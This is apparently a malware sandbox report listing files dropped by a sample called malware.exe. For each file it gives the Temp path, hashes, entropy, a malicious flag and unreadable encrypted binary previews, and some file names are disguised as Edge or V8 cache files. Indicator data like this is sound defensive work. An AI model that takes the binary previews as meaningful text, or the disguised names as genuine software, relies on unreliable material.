                        Preview:.rig....<..XQ......Vs..C2...`.q.....'..Iv..I......8.$n.s..U.#mE.+O-..[....w..............k.9...h..l.97....;.1..T%)....Y.Y...?.}O.X.G.Ev........p...<.. .*....$D....... .y..5.S....6..9.j.........e...X.....F...+.}.z....N..Q..U..=I.9.q.v.PH.3./...e.Zi....,T.U6....*.tt.m....k..6.3]..O-MuZq.H..-..mx.....RR.&5....?r..:!.vW.._....#.:...!.,.w`..N..}.v.a..QA6.X-.#..b.0+.q\....[..J...D.N..i.<...7.....(.p.i..x_j@w..H.m.b"...|..(Y..*.%.N...LZ[..P.TS..N..~..x./V.fTb.9(...U.E.v."....7!Y..{.9.Z..i...[.._..[U...5...0.3=...|..,?q@..>V..?)Z.-..O..u..:.^.."....y.....%'$..h...*n....b....;{-K\.H.D...<.....3.%......_...t....f>....b.2. ..{].'.(.F.#.U.....U?..K,..nKyd..].\....EIA...scM$l..r..i....fXa*&J....0m3..J:.G...EH}...a*.7.;3?}.c....5#..r.T.....*~E.8U.!.}..8{.Ts".6...e'.nM{.l.......1.Aa...t.H...%?1..E....U...%.w=@.e..."L../.Fa.b.oB...vF:......3....H.@...6...R..j..[.........'<.m..>m0.-..5Y8.J...Qz.[............r5.n...*."..)S.....GQ.. .=(y.O..2..!N.'.c.>..@.*..

                        C:\Users\user\AppData\Local\Temp\msedge_installer.log

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):21867
                        Entropy (8bit):7.992364455969976
                        Encrypted:true
                        SSDEEP:384:gdTiSYEE8WcJMdow5VFQk+QVbwvSilZot1xmXrPInUkOKu1PQgeuhThE9vUEqp:gJ2BcJMZVF5lVOSEcXhVulBe2FEnK
                        MD5:B8657040F3FC32874FCC72BF8DD26356
                        SHA1:5B993D89C7D224D174A3DD5EACC02C52CA0F18E6
                        SHA-256:6FEFD3E29E8BD15A30E7BDCFB004EDD43949D2EC60D0805565E7791C142DE22D
                        SHA-512:F787234D92ECF1CD9E8F6C7A1EC0D9E907E53DB9310694DB3852A7A85B6C7EE5A7EA39D8B98FBA5EEE44C095D445D087B45586B2337B64E9C748B5D60A0E64EB
                        Malicious:true
                        Preview:.e..46.^s:d...XW?.../.....#.a:..%...r."I.!].?Q......,.W..s.!..q.1.x<.~.qz...d..l.{..0.`....D...o8D...{..q../a.....B.-.m.0+..P&.GR.......R...[.....y.a...#.\`.."8[.]..5=.CSg.O7..s...].i....:..U.1Yf>...G.F7.g....~...@.....>{....K^l..<.....B..^..7.oR)..[...A.:"./[C.>xb]..:..U.|...........9M..7B,1.8......S.Cr.....O..U/...P+@..R.'.........C.uL<>;.......u.V......F..../.....t... ....8Z.......Z....,.X..........H..YZ. ..FK...=S2..........z..h..P_..}.\..M.3..o..^..Q..H..~....c.i..h .Q..qA..K...<.b.dj....1..........a9Y...@.r.h.s..=8..].U.]..#R.!.f..,y.../..a......(m5..K.F....g?.4lB L...r.p.CG.`..i.......k.%.O....o..3:..&...).U.....'j.e%.......2....'...NX..3.{\.).p._..H.O..4x.!<.a6.`..(.Q.Q.....c.....h.Z5z.+.fB.00.aZ...d>..QMl~lS.7.{?..^.wC|.H.c..i.|......X.R...V&..aF....^?.k.1.Y..e.y>4........s....Z.>.........*1U.W.]rZ..Ie...P.-..-l/...iJ......$..e"....3..].....\...T..F.....>.o..K..yN.../.O/I.1`....o.....@.L.g.>.5k.:..?...H...C_...3..zE...,....

                        C:\Users\user\AppData\Local\Temp\offline

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):24684
                        Entropy (8bit):7.992966355767848
                        Encrypted:true
                        SSDEEP:384:YOugB41c5BzxFbvd1Xhu9sW4flTgNUD4kSFXja8t2aeNNJx4Nx6PatizudsmK:YOuDaVFZjuiTmIShjnevGW4sf
                        MD5:E1480296CE23570E8E21A208D9689805
                        SHA1:F3EC191D8704E5BE1FF6E27032FD42787E80794E
                        SHA-256:7BF83145FC5BEEC4ECEDD825C8733DD8E2048166FDE31BF50E046247C291BF2A
                        SHA-512:28CC10644B5F7FBEA29FCBBA8C7D5DF38E56495E4DE6E370CCB5DC20511639F09AB83C1191DA357FFCD4DCFF0B47F6816D94E389143F10433B909C4859586CE5
                        Malicious:true
                        Preview:.R..F.;..k.R..0uK)..6kf..7..r.......Ms....^".|X'..1.[........!..o.._wx:... u....kf.)h.k.6<U..Q.[1..a.V.'.<w^..j._(Z...L..^.X._...].$......e.^P|...f..j...G.R.F.......k..=.aJv[.tN.v.v.=...8..t..[..;%<..../#.d.~..m'l6@)....WE.[...yc~^...8Fbs..!.5"R.....&y..3.".....`8@R.i.Y.o$.....d..uE..b...U.... .....&.j~J33tq.'...w..T..=v.3C..L....x:...#..8..`.R(T.I..`&.s...).P..L..d..........R".;q'.A.`.'..s2J.Lu.AT."...Ir.3Y.H.&k...'..`..Dq..HE..+.. .i'`P......<.r[...D.[..Jb..=.:.[..Jo..c...r..>.).*.c.R.......T..(.>.@....0_...R...!T..Z.e...a .J.y.....@5M...&)...c....]....V...........c$) Gg....0<..T.I.Qb......)...aU6.u..e..p....T...3$!+...~.......`..X@..uYX..c.#,0.%.A?.|F...Dg...>.......r...:.....Ok#..<..tq}SO.......P%.....K_...I..w..rl.C:.."..0..5......m..7.Q+..p.z.R.).%k./{|R0...HW....s......@..$o..@..+....ec....[..i.68>.tL&bDR._rS..-.es..N.S....zF(|...AO;..jZi..G(..GeG._...X"G.It.....X.6..^..VU..[...x.Y'D..TV.!..o..X*.S.....'.....p.O.<.PN...+.@|.2Q..&B

                        C:\Users\user\AppData\Local\Temp\offline.session64

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):66316
                        Entropy (8bit):7.997385597782261
                        Encrypted:true
                        SSDEEP:1536:j7ZT3Dne1s56LzjuOktH5k6fjKCjwqP2VB:jNm166LWOk5fjKCsqOVB
                        MD5:42732B2CAC79A8F018C93D4E312ED0DE
                        SHA1:399E56619E5B71EFF3930D6125C6A40C24D20BD5
                        SHA-256:CFC4E771AD7C76B6A4F511C25200EFBDBEEEE99C3407642CF99901FEB77E5664
                        SHA-512:2153D91B79DC1F4FFFE599D1D62BD7F3C73FE2BD2A10C7212BB66A4E0D3AC52D430D0486FA820D065D3A18B57B91D112053870C8DC7E022E2B414D5942FA4F9D
                        Malicious:true
                        Preview:....jN7.b#"..IV}8.D..C.0!.F..L_H..E..]....^=.............=...;h..k..f.{T.w..K...E..B8Z7_.`.p!...f.....Q.......B..=...'rnO.....l......{...Z.@w.s.Q+&.e...U5...i...pr...*..~.V.N..V..`....)p...|.Y.|3...m....N/J..ik|..#...6..G^.P.=....\`..$..Ge1<..lwgH4..."KS..h.....RDF%..u.VV:.q}..."|.]X...T0.E.$~s......R.$..[...~h.i.3.D.*.I..ntA.!..?JD.2NO.YR.p.AN.w....x..&9.s......H.~..R:.~....cw`......+....M.&...z.._..X.u..y......4%D.ym.+].]9K).&{......Q..v&.Sl..&.j.~}%..Y..s1yTdi.Zc....~u.........)z.T...k..j".P..1d.....Z..)h..M...0..~...)..[^.........oY.zg%..'...=. K..m.#!\_m~...9....rY.n....Vh.h.bD>.u..=..n.2..P...sP.....a....|...y.z..m+.C...UQ.;.......m..K]......YJ.M.9l-}c...n..Y.X\.......QMA`.t.....d.S.....g...N.._.T....n...=.|....4..+=.x..(.....sE#I.....+.......s...`.>O^]}].W&$...n_.j=.[i..\g..mX.~.,..H~|c..0/.....(...p......W...fM3...m............N..T...1.&#.m.o.%..eG..Qk.....lp.VahhV.?...&r..1..x...._P3..'.~......9'.$>.....;jE.!h.e..q.8..U.`...V.D./...t..ED.

                        C:\Users\user\AppData\Local\Temp\prep_foundation_win32_bundle_V8_perf.cache

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):661823
                        Entropy (8bit):7.997552662744821
                        Encrypted:true
                        SSDEEP:12288:BFI2676/0A6LIoi/E8BnYxhSrLqzQBu1kP7huELNmQaJouyUiKA8+A36gPy:3LsvLfCnTrL/9PNu0mhJouyUi1gi
                        MD5:11FEAF0C623BC47043BC5788B6C0F494
                        SHA1:2C5638E29D31F6CCF2C3E1A2517106BB04AA0F61
                        SHA-256:E862891F782D0D65BCDDBC6B4EF1C3F4AC9BC45FB19F0B45FA5AAE54D11C8AD1
                        SHA-512:FA184B7FB2127AC67B4BE6956D3C5BC8AB58ECD391DAC3848C8E3B25DD66EF1B7B01DE37D6B8EF27F766F355895AC832E1EEC5AFADBA9AC300E58065D41B5A9D
                        Malicious:true
                        Preview:..C."R./..]*...63..t.X...j#...1a..-.|.[".x....F.3<..q...8..1...^...+.........:.....2WiVvH#...^..l..n...9Jr..!O..aJj.(..aW..M....X......!e._=.gX..}...l...)AUj..VQ .]$V.'jw..."..?.(.u.?....1f.l.Y...f.Y......#.-.....\t...J..iZ.......&.........P"&.y5..AJ..yMc.-k.&b.57>E......q....5h....U....AVONc..cl`.O.x=Jn...D..+.6w.w2.W.K..q..`....[..@.5...d.... ..H...xPU.......h........Dj.?.E.....2#z.Vv%.......ylR....[:....#9.....7.$........X.z&......v...dgb....y...D[O.r...'.5...].o$.....j.r.E...wYcqgV.-G....b...J.c...t.Q.......1Q}..q9|S.t......$.*.....z.$......K9.g....`.^;...+u....nO..$....u....eX'...G.}.i;..+...+.%z..}m.e.~.;...v..(.jq.E.........c\......~=v..)...j8..x.'..b.6$8...EGZ6....m..w..n ...@!.5..a..4.,.5.o'!ma..3..\....V...$.$...G.$.A?...J.-...o. .^PF|fP..g.`...L.....{... :..<.......d.....m/......YY.^.v.:&...H.m.q..F.9..;.........-.i4........AY.%9....W.x[1.}_H...6.J..e.\.g....U.cj6}.....#.2[....9......N.M.....|; r.dg..I.X....5..W.Q..`.....

                        C:\Users\user\AppData\Local\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):193071
                        Entropy (8bit):7.996495903864831
                        Encrypted:true
                        SSDEEP:3072:TTa0j9oPmOasgRPMSgqdMo7jZD1KEoTf4FonaDfT4DTEJAyjXsTpua7dxmP39bDP:Pjj9oPmiCjdDtoEoTfmc0myQTpusfmP1
                        MD5:D112E5D54808D300819F79A8FEB0CCDB
                        SHA1:C4763AA6BAD5792475763260A21D29AE0792B0DD
                        SHA-256:F827A0E2370EC4F99CB7D688021E4A42AF2AD198DB8E141C6DE75F6F4CD3CB55
                        SHA-512:AE742808C265D31944BEC8476C516E6720B906220AFD4C74EC88229151EE24AE12BCC654DBE0122D1C2EA7CA158D5FFDFB4DA07048DD234D9436BC0EF5E6249D
                        Malicious:true
                        Preview:....+...[...K...2(.Mf.C.E-...E<[.(qt%.QZV.1.}...<u..N.....@...&..h...s.a.?..H.@].<*.j...m+RM`..I@K.g..^...)xNZTRob..)i..'2.+>.l8)1...G......uO....F..u\.j..@..+.1...?.@w51.b)...#.s.;t...3..#.......<...p-g%...`....0.IT.HJr...\9..4.?....'`.....0.k./.o........KJ@. ..!..J/09.R.j.k@..{p.7.......-....bu./....).%.>.y........h.BB.3f[..6h(.....ld.X.....j"b.R....c6..IH...9.*u.....?6=...Gf....O..s.h.w.E.1t..5$[5G...v..h....c\.Rf.`.Kc.#...p.]c.'..l@.g..e.0m9..`3.\.#eSz....d.....H...E.......f.6.L.;........s..;...Z.h.O...n8..tL....K......\_u.j=.)}..P.\..#.r.Vi...:j.Q..V._.j.X;.._K.d-.R'+z.ki25.t.AC.++..f..Y...j.-..u.=-~.'.......D..VE...W..c.M-T..=............<'..Z....:t.\+.....io..9....m.I:.5..q...^.X*p..ZN...B2..Q.x'...,~.!.G..".a....P.d..^.~)M..}..._t0.+.*..N...<..9c..I.Voq..V*......%%..,[....[k.x.."...1.^.l._....;V....Ls.O5p........8.{,......m./..9.E....Wa....[.<....4....{{.{....;.....`.....eR.5.o...L4p%Hy-.a.f...K.E..9.............f......W\G.h....[..4.a

                        C:\Users\user\AppData\Local\Temp\prep_ui_win32_bundle_V8_perf.cache

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):240015
                        Entropy (8bit):7.995523418887752
                        Encrypted:true
                        SSDEEP:6144:viQKwyIy5URlAHUHtFmeXBRWf52kwItPSfo2JbcI1eC:vn7nGHUSexRWfU7IVSPbcIoC
                        MD5:83DD5019363C12DC5B0064E69C759784
                        SHA1:B4173E1D170D962479A2CBF80D2E6B2F140A1096
                        SHA-256:A1959CC49A19798CD27DA841C330E55BD085837CB68A2A92DBA80B3DB96431B8
                        SHA-512:E4233BBB61B2B08E5892044F56D6C31893A48B99CB5D8894BD2F485BA7AD547B85D8324E9B90E5B3DFBCD775B1842A41CBCDA45DE732645A9F172E751A803572
                        Malicious:true
                        Preview:X&C..A.....g*4.hO. .r{...:..d....+.":Q..uJ\...vy.....$-;=Q...`n].#`.-.yPB.S.'gF.....e.b.M...!.|...{c.E_.....P$.I.....X...|...R.n<.[O....8.T..^.!.....2.*.a....2.1.}..... .W.S....7.$0w=..u..lH$..T.b..4.B....<....9@....Dh...9.s..(..]Jr.../......~.)VF].......b."..N.C.X?...K=i.X..A.$-..&z..).....+.H.K.:.....G..c.7`..mC9.@..Y..n.,~#.U..."...3.."....:.[......qB).N..n...^U.....8.....;...!j...ez.+...rg.A...hl..r.\oN...l.....1.@cQ.5W.....r.t..n.SQ5...a...b.............X-.0.{.zK.WKD.....:M..[\..y..b....R...2f.0....v....x-U..)......l..'..:A.^.e`.,d9h7..'h..T....R.f...zOf..f.\F|...E....T...2t.i.2..w..4h.~..;`:.[7"...2.........NH.....C.d../+..^...v..+N..E.D.WJTf...$5. .9z%...MO..vm...N*..V..N....:wp+-OH..Z.h.......=..3j..V%_0...5:... ...}...t^.....o.m..G........>,/....w...g....S...J......./....[W.m..:.g.\...3..4m.F...X.....V......s...b.o.....Ag?....N..2..../k..D...8YF\.9.e...0.......0.dm..my.&....].qC..;...U......nNrBe}.#...FUog.m.\..w^-....u$.....

                        C:\Users\user\AppData\Local\Temp\tmp3A50.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):147052
                        Entropy (8bit):7.993054571054567
                        Encrypted:true
                        SSDEEP:3072:DUHmj528ZBeQlQUjLOEZlouJaqnOuVTJZS/3vXA3XzqGa:hg8ZBTqVuJaqnOiUnYXBa
                        MD5:31DBFCE1979492A9BE47C0E22C6195AF
                        SHA1:3A3B56E30F28E49084CA1659D762EE1F8E62764C
                        SHA-256:85AEB7845F9E1313013401DFC5D9E2D169645F2049429E6A98980C7650776DA3
                        SHA-512:07EABED144B896AE823E8F9B17B5ACF17A428E45980F32C96BDB5A7E6A0ABCD2D239A7F74DC9D0D7A78D19B2C983E9033BD4D7851E9F22F4D83EBB537415C80C
                        Malicious:false
                        Preview:....q.fR....#....b.......T...*..q[.I.R.=.nG).!.7.....NH.9.."Q..2.h.h..J...#...Q....4.@.'H...........A..}.....p.xc.|.~.0]..E...].o..w.U...b.......g...{.&...i.Zv0d...s.1.x.e..R.9b.=..T.......:v.+!m....Zaa....(zED.......f.h3f...(j.E.M=A..,A..nqX..UnI...?P.....e..l4...K?..C.l........h@.....BP.q....~~.......]9..5?.|.$>..5A. u.=.0.%.r...W.G.j.e.F.J.z..D.O.!Y..d.....j.DIqU....+.....,+.G[B"....V......6..T.n..?..@7.?..b7./Z..f..^......G..O..5..V.?.r$.j.U....X..n...%.S..H..W....[..B.....kw.%.t....+S.Rri....$R...S.....`C.R+.{o[...f...G\.*...K.....L...."...}.&E.....".........-....V.`.5..L.E....A..P:.....L".k.p...}0x.Om..B?5.PUz..e....".......X.g...."N.C..E..{z+*..?.....N^.E....f.q...[...Vh....*.(....yhuA.....J].s.6..c..7k[.....W.0;V....)@.Z.4..y.SK.........B..k..{.E..i......iV.../S.,.npP../+...*.(..1.x...L..r/K..)H.. .........<.g.Y2......n..7s..o4...cf.H.c..............R2.04....]l'.vVM.]..Y......E743dR}...V..q....n2W.QH..>...e=l.6.N.......'q..%.

                        C:\Users\user\AppData\Local\Temp\wct150C.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74314
                        Entropy (8bit):7.997230077086445
                        Encrypted:true
                        SSDEEP:1536:O2xawbdj52W14DAtPaFcPqJrC1uO3EcNxxnu+UBtgQTURlO7Ewe:pwwNAW14KC9ncLxsBuEe
                        MD5:0FBBCD85EBD9201939ACC15A64900B01
                        SHA1:39FF0FD7D2B348376DCE7F11732A0E502EF476C0
                        SHA-256:2B0C1ED24F6CDC41E615655EB39356F4DB9061843757ED28C9C2FA57B0A8163F
                        SHA-512:7844DF06A1D5E13B4A0025809887E70897C831264D2FD2880C7391754D2C782FC5BDEE4FE6E0CFA6BDFB2BE5940FCB459C5462A335597EF38EDDD3B2AA6BB024
                        Malicious:false
                        Preview:g........wk.jr@..&F....{.J.&r|...mAo.8...xR$..e...4|*...T...4..#..an...h-.W.<p2C.].......f...../.0.^;I..../ .d.8..-I5}O.l........-...U.-r......m.|..6..hW.}+.<...#m*.g....0..-..<-.p.2.).....&B.T......'.Z.5}...Z.)..x$`rs..+..$..p./iY.....U.X...q@.;....Q...\,n.W.m.f...,...........4D$.Dz..l...&>LD..e..|.L.......}_.T.C....}..z......G.......x..q.].....>.TW..gL..WP.....]..&.&..T..?2T[..3..[..1..[-.. .Br.......w.|w...........q.?.......tbPB...R.......B.Y{...2..H.....f.5..&4....j.z..p..0..I..j.'Tru.}`..2].H.X/..h.\.Y...l`.f[._.?..Sf>H.a..w.SRp>...BR..."....f]..*.A.N....wM.X...w.@.....r.<..e&.ie.z..A.rd.1zmJYl...h..aW.g..9'v{2w..6.Z..e3...ne.........r|s.....HR.'..Bm..i.&...ly..-.7x.-%.b....n)..,s...AM...2.m.y....... .$.R....n..QW".M...~2...4.L(.[7Em.SU7.....c...9../.........S.....Ym .l...S....8.7...|O..Q$Xz...s...xP.,_.Y.~.w..Mlh....k.WW.r.pz..yH...&1.a`..(....s!7.h.k.!<z....#..o.......#7.9v.....^......cC6...*8..~..d..O..y0..p..w7-..

                        C:\Users\user\AppData\Local\Temp\wct33D7.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64962
                        Entropy (8bit):7.997505097679637
                        Encrypted:true
                        SSDEEP:1536:V/PNYcJscEaHwpmHxr4dseCDA0CSL/APJvDgHXjvZgPpx:9NTvHwAZ4dLOA01LAPJ7g3jvZgb
                        MD5:5D974ED9BB68C81B54F1E08A1CAFB890
                        SHA1:474ADAE713F41FE78616532A05B0C77FFF93F9E0
                        SHA-256:13DD5444E116E3A4AAFA17E3E8F45477D2A60F37B436D49896B8F89EAEC5E741
                        SHA-512:7D18DFBB5627998B1B22EEB7E53F3DCE638A92230D02DAAF178D82B234B2F41410AD292A0D4612463506874E12D559D242551A631195F96170EBC9CBB4602B99
                        Malicious:false
                        Preview:.e..t-.r.K...,.l.....v.Y.p.=.r........p.b'.X..N.e..C[..z..~H.......p...FM.%d.."..:..Z..Q%...}...f.TF_3%..~..}..]:.....<..'.IK...#^./.o.g.....4V...D....t..4.m.....w.A.)........k&.9.M....+..'.).!...CE...Q.....[~.W....0$.J....C..D.Q.7....5..F&...F..t...f!.....C.^jJ.C<...aG..;1..Rly.,w..E.......z..S5.\`I.0.4...4.~......!n.Z....).`x..).t.bZ.h.c..a1.<.t.=.%..3D..7,&....u...|.......)....:H8.L.D.Q...~......I..C..P...N6.,..Kg6y.G.'rEX%....f..K.#%h.&w.....>.G.x......%...IU)...=.........7...1Zw..j.)..^.].O.P...;...E.|...v...sC..zm.{.@...,.!9$.QN........$.a2..)Qi..bF.*k_.~......m....}*..r..CV"..........!...[..>....*...,.......D.2..=.q.ry....[.W.E.$I....d..V....D..0.......... ....7...u.S...[..........Z..:.I:...xZ.]@%U.o......y|.).....}.t._qy.`.y............bF B.'p...t.i.u.@.+...(p.9....J.....I:...n.U/.}.....L@r.A...w...4._...(2t!.%.X[KN.d..$YB.....F.)....\y.S. S.8.n..]..v..+.."......l>..{.!:.R.....^SDPf%".:0..bq.mb...U..u..\..%.lC=8.8y^.~..Y.G9x..u...

                        C:\Users\user\AppData\Local\Temp\wct38F0.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74314
                        Entropy (8bit):7.997621180914919
                        Encrypted:true
                        SSDEEP:1536:/TBnCOWaGUG0W/Z1hmqa2UYjJKqmggizc4+4T8mi:/9CXav/eZ1ha80riThi
                        MD5:C8C1D43D8263389190D3C3C7F2D94A45
                        SHA1:E5CAB40E564A05E479F3FA5051D0E16899199FF4
                        SHA-256:B78EB3377188ABE45620CC4D12C875C98E5889BADAE992272DFCD1EBD9D98E20
                        SHA-512:3585F623DF77FC505D8DCC2DFBD8DB888D7A58FFC0E85CA636914406083105F33F9A582E3F823C54C89E3EFE7ED997CC274470ECC7DED55D9DF65F27DC674700
                        Malicious:false
                        Preview:4..bfb....Du..O.".@w.A./.G._..@(...g..f.G.C.Z.......... =Kfy..52..dXe!..N..;So.t.......\........<.....@.<.......W....z~..c...?.........J...'..t.v.ZeJ..:b..Z.8.T.z...J.t<.&..xg.d...{1..Y*F....N.-..V.N.h......eG...p.t.J...c.:....p.....v.xO....Y...P..j...9.~".....C......P:...b......"B...?..m2......g.F....t....S.......?...R.7.et..m*..R..(..ZAW...O.I...q.3....b..8.......P...4S..=/.k&ex....7...dPn|<.O.I...u.|......#..X{B.....Y.....5....P.....%...n..%.k.F...'?2.F.j.SO.L......5.&v.$.....SG.{.....(XG:.6B.t.....k&.iy+.En......Z&.......A.kd.....7....Sd.o}+J^...B....t..;4O.W.......... cn/.. ca.....,.6a<......*.*...e?6...../.'>....Y..Wn.~..u..r.;.(.....R.*;.*...."b....mb.}V.........>......Z1....z......'..O.G:..o1IBt.l.-\33..q..H...8^..i.IS.R...':j..H..1..^...BE..&.g.rA.....|..3[Kak.Q....'...A*.BB.A.*.......BP..41.....+.yga...[....Kw...2.5.A..........vl.SfC..*l...\O...&2./..~...#.K.M.g....FM!i.Z'.."....9...m.TnN.d.nlUo...[<...\X...Ke.......8..7

                        C:\Users\user\AppData\Local\Temp\wct3D66.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):1600972
                        Entropy (8bit):7.9580137118856396
                        Encrypted:false
                        SSDEEP:24576:YV1ygJxLSxR5xrKZ/aM78TLuGJXsLnAPor6k4NeSRzTHLDBkRgxjC58e2qIvJ:Y3ygJxgFWaycLuULQBQB7LFk+x9NqmJ
                        MD5:E6F158C187029B30D2BC8625F065A3B7
                        SHA1:A543D3D0DF4899F48E513D1721A4E4105F5A55EE
                        SHA-256:90D0C7F4A88099F236723063773A67510353E65E8C34125FF67FB17D67B0513A
                        SHA-512:B41D1BDB3994AF8F7C84DB1DD8CD37BCECB06FBF9065CCC33FB04E7C0996BD40BF931FF8394107CBDA511FB63A8E27ED5ACB3B72D31C69C38293B0FA4BABD749
                        Malicious:false
                        Preview:.{......C...............].;.b..#.L...8.k.......{TpI...{..J=.S.....0..hF.."..I...{.W.$4...(xO.^(V]..)..J.w..~...j....:..Y/Sq/..*Q.!..1.jU,(.....G+.(pL@.a(...f......R.C......x.P.>.....`......{.....4........9xJ....`.l.....W..".."..R=.n..v%K..t|..U..h....T..Dh..W|.P....z.xm..+U...I..,.fW..~.^ZO+A.C......%.Y.m.~...._...?..(R~.6q.I.#Mq.l.R....Z.Bkz~qS......E.....l1+..".........7...O[C.j.<CME...`^...D`.......[...~..e..Py.>..wBY.bz...y......n..R.c.F....*...,...e_.Gw....&..l..t.0.....J..+P89..\....r.+............^~.`. U..[...|..m.|..........@......?.....`.....y....k...l..O..E...|...k#<E...b.D.G.b #(...t.. y?.....`.+...{_.....$.7.. ...<KP..o.Z..!.h.........*U.0.pYC.P...g..t.m...m.f.<.%<....a^0`.P/......<..n..#..kb...AC....>T..'. .f..,M.P.P..F....E..!.N.......\....f7L2.......;...........P...e.i.lX..5.gY......*Ng.f.d..l...bB.7sb.g.B........$F7ll...{O.g..~..B.*..}n......5"m.9.r.*.*R ....o..=..k.....%..P...W.....R.w...;i...EF...^'.^....l".....6

                        C:\Users\user\AppData\Local\Temp\wct443C.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64962
                        Entropy (8bit):7.997111874243782
                        Encrypted:true
                        SSDEEP:1536:qLghXfMwl4B8mKLXuqA+XBQTChGRR8D559hANofGVZTQiqTa+:qoXhlMBkuqNhoR8l5LA6uVdQisN
                        MD5:7525E319352B65A7D6BC09F41D2DB6C5
                        SHA1:8882460FA7974BE786954F006A922D580807C02E
                        SHA-256:34237D6B1B71513075227BACF510AA1B451BF012AA747EE4059982D3E8318070
                        SHA-512:06DB808056BDC0F5FC3E0930893A235C0526771099AC9534059424AB3C881A7C6BF2E25A5B147B8323AF03B0A00842D9293AA6E6A0838DA9ED337BF178EAE930
                        Malicious:false
                        Preview:.Md.!.?:.9.mb.)h.&}..^..\:.QD...X;...("......._k..Y............BB.l.ju1.;..W.)x6\..C....&.I.5C.LP.y..*=.M..E..(.G....d..I#.v.H.Z.Tz......=.Hx\.YS..}..v..N.m0.....b.I1O..KW...%.Vd..{O........m.J...!IJ.O.U.t.".K'..z...-.-...{..V.V.%.[f....2.../....2Ba.....c....B.g..6.m...@.y7..&......B....z..;.....E.u....|5...r.<]k}..crX.....X_.......G.I.?..W..6....V.+...m...{.I\2.....=..>..a..Z{}.{.....J.@[..7=...`?&;...L.%8.g.... wtY.9Rn.F..<..[..r.J...."[...>...s#.QG.+ 1...t.A..?MV.#.pHQ;,...y\. o..6cf8o....@..|U.#zgy...!....t.......y..r..U..f...s...]..J......F.DRJ..%..D..i....0.._.1.#r..F.$.....R................s.D8x.FvGG+\..QN.........S.A......;.>.&.yj..,a.U.|.G..l.6..#.j....H..E..P........xj.l.{y....^e..'.3.~..I..W........V....l...2QI..{.....p..y..U{.=.......q.G.....O......f..,i.....I...|...b..d.Z.s...[s$.Iow..Fy.R.n.l..J.......VI.Bp.....k...Y<....QU!g...H#..XE....NI.....xK....V79.*z..^./....\.....}U..8EE.&....n^.5..>...)F.u..2...{.:.. ..;~.

                        C:\Users\user\AppData\Local\Temp\wct49A7.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):64962
                        Entropy (8bit):7.997222014018381
                        Encrypted:true
                        SSDEEP:1536:SsmiPX/b0ANh56BpmfN8DL1KAjTlAeR9CQSry:bWANO1dR9C/ry
                        MD5:2D64EE380DE1224CF47553CCDDBD2CDD
                        SHA1:B33096F2821E0AAACC226F4509709C601D3FD3EF
                        SHA-256:21B032E07398FFB42E55342941C92E9F1BFE555E114A26C89CD2C0B19371C047
                        SHA-512:A0DDB4EFD34C4873CA1E4D8102E7C3DCC0F9A6ED241EBFBD4742AEA77532FBE27E2EBA75EF51969D7660F754366C3D94AEECE3C2D0D77C2B45775E99FDAB4CA2
                        Malicious:false
                        Preview:...E...i.-Q.K-.5u.(0h.uhF.....vX..`.m....ieK....N.....#...OK...&..,R..}6X......K.......a..Np.8E...C.*.5.. ..........'....;.@.P....LX...S.y.e....~e..U.9.>#....|D...@.|0..6;D..0.A.:r.X..w...O..B>v4..2.J-.2KR=b.L.k.............u...:u.._.'..+l)R.\.C..7K,.......w}.o.Z.Z..m.J..3........l.Q.,...1,...!: ...../"..E#4....R....Xb.ds.n..(.d=..q}Z.#.r....b]..q.cO.0..Y"$.l.L..Cz.+.T..0..o.....H.....y..^{E"..W.+..H...;W|...._..Q...6...;.....;....}@.0..Fx1..2'W.k..(?..mX`.....G...#.T|..[.s.....|.v.....9.g......z.L;..Qk..z7.[x..D.T..QU.D3r..r#......9.....[Zu.u#j...|.x.~.~.....*..n\....:.......*.i...C%..>%.......nN.aP....mjE.m..b.9.Z.....|t^,.^.......ieZ.(]...2M..W..L..1VL.....f.l:O..?h..QS....T'T.C..!..@..GS.<.?jL.*..!Q.8.{1.^9.lI.>O0....##...v.oS..P>....>...E.G.K.{}.....oR.b<...9.s..S..g..wS.5...y...H.......Zyy...^}.u.4|"Q.....1yK.I.x6r|.~..{..F$~(...N.xs.R......q.I.6.7).h.I.x..t..{.r....n.....9.0hr!.<HJ7..h..e|..V+...)..bX..'F...{..JLa...{Rm...'e`.L3...

                        C:\Users\user\AppData\Local\Temp\wctAB5F.tmp

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):74299
                        Entropy (8bit):7.9979160950358885
                        Encrypted:true
                        SSDEEP:1536:DkMWDt+rBHt8h+g5IvahoHgv2dYJwvK5KHnEGz9qT/NTGWI3:pWDc9Ht8EggahigTOS5KkAkT/JtG
                        MD5:7FC8A26F1DE01821F9AC80D75E4C1F9B
                        SHA1:E9BCA27599F3062318577C675ED0D4F4BDCCA7CC
                        SHA-256:91F762B6E1C77E0490587A004A4D21C68F8A35919FC61EF90EBC75342420C1B9
                        SHA-512:2BC5C3ECE33F2713998E0324AC654B69B2EE5FB6419216DE18260141E01254B626C7F2E3DAB654CD7EA3848A415DD2532D238F7AFEB9BE01AFB817D4E8245B85
                        Malicious:false
